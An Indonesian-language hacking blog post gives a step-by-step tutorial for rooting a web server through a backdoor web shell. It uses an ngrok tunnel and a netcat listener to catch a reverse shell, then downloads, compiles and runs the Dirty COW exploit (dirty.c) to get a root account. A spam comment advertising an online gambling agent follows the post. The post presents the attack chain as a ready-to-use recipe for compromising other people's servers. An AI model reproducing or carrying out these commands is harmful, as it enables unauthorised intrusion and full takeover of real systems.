Rooting Server Dengan Ngrok

Tutorial Backconnect Dan Rooting Server With Ngrok - Oke kali ini saya akan membagi sedikit info dan pengalaman bagaimana caranya root server website dengan ngrok with backdoor shell. Sebelum melakukan root kita harus 
menyiapkan alat alat dibawah ini terlebih dahulu dan pastikan website kernel 2016 / 2015 / kebawahnya, Exaple :

Linux BKPSDM-KRW 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64

Untuk  kernel 2017-2018 belum saya update karena masih dalam riset :
Untuk Localroot Sudah Keluar Kalian Bisa Cari di : https://www.zaenalarifin.net/


Oke langsung saja
Bahan-bahan :

1) Netcat : [ Here ]
2) Ngrok : [ Here ]
3) Localroot dirty : [ Here ]
4) Shell Spawning : python -c 'import pty; pty.spawn("/bin/sh")'
5) Kernel 2016 / 2015 / 2014 / Kebawah.
6) Kopi + Rokok Biar gak panik ;v
7) Jangan lupa pacar biar joss ;v


Oke langsung saja Pertama buka ngrok , ketikan ngrok.exe tcp 666 , 666 bebas mau diisi dengan angka berapa sesuai selera ;v




lanjut jika sudah maka akan direct ke connection ngrok nya



nah jika sudah connect kita buka Netcat nya , masuk cmd , ketik nc -lnvp 666 , 666 itu angka tcp yg kita setting di ngrok tadi , dan jika ada tulisan listening on [any] 666..... tunggu jangan di close



Lanjutkan pergi ke shell kita lakukan backconnect terlebih dahulu , isikan kolom Server dan Port :
Server = 0.tcp.ngrok.io
Port    = 17781
Notes : Data diatas diambil dari ngrok di bagian tulisan bawah :
Forwarding                    tcp://0.tcp.ngrok.io:17781 -> localhost:666

Lalu Connect kan



jika berhasil maka tampilan nya akan jadi seperti ini :



Yaps selanjut nya kita copy shell spawningnya : 
python -c 'import pty; pty.spawn("/bin/sh")'
jika berhasil kecopy hasilnya akan muncul lagi dibawah setelah kita enter perhatikan gambar , jika masih tidak muncul lakukan spawwing ulang sampai muncul .



Selanjutnya kita copy dirty.c ke website target kita , ketik : wget --no-check-certificate (url file dirty.c) lalu tekan enter dan tunggu hingga selesai , jika sukses 200 OK maka tampilan nya seperti dibawah :



Selanjutnya kita cek apakah file dirty.c kita sudah terupload atau belum, caranya kita ketik : ls *.c ,jika sudah terupload akan ada file dirty.c seperti gambar berikut :



Jika sudah selanjutnya ketikkan perintah : gcc -pthread dirty.c -o dirty -lcrypt .jika sukses akan seperti ini :



Lanjut kita berikan akses dengan ketikkan : chmod +x dirty



Selanjutnya kita jalankan file dirtynya, dengan ketik : ./dirty , lalu isikan password sesuka kalian dan Enter



Tunggu beberapa menit tergantung server nya jika server jelek ya cepet ;v kalo server bagus lumayan lama ;v 
Jika berhasil maka akan seperti ini : 




Setelah itu tekan CTRL+C lalu lakukan backconnect kembali dan jangan lupa pasang shell spawning lagi dan hasil nya seperti ini :



Jika Sudah melakukan Backconnect ulang langsung ketikan su firefart , dan masukan password kalian tadi
Jika sudah selanjutnya ketikan id
Jika Muncul "uid=0(firefart) gid=0(root) groups=0(root)berarti kalian sudah berhasil melakukan rooting server ;)




Website has been Rooted ;)
Semoga tutorial ini bermanfaat ;)

(Zaenal Arifin)

Post a Comment

Selamat Datang Di SenidominoQQ Agen Poker online terbaik
SeniDominoQQ akan Melayani Customer Service yang siap selama 24jam Non-Stop loh bos
dan dengan tingkat kemenangan hampir 95%

1 User ID untuk 8 game
Minimal Deposit kami Hanya sebesar Rp 20.000,- & Minimal Withdraw kami Rp 20.000,-
HOT PROMO wwwSeniDominoQQ yaitu :
BONUS TURNOVER 0.3% SETIAP Harinya ( jam 14.30 wib )
BONUS REFERRAL 20% SEUMUR HIDUP
BCA - Mandiri - BNI - BRI - Danamon
Ayoo Segera Bergabung dengan kami Hanya di:
Link resmi : www(.)SeniDominoQQ(.)com
Link alternatif : www(.)Seni99(.)com

Untuk info selengkapnya silahkan hubungi kami di :
- FACEBOOK : SENI QQ
- TWITTER : Seni_QQ
- PIN BB : 561A1388
- WA : +85515635548
- Wechat : seniqqcs1
- Line : Seniqqcs1

Agen Poker
Agen Poker Online
Agen Poker Terpercaya
Poker Online
Agen Aduq
Agen Domino99
Agen DominoQQ
Agen BandarQ
Agen Sakong
Agen Capsasusun
Agen Bandar66

[blogger]

Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget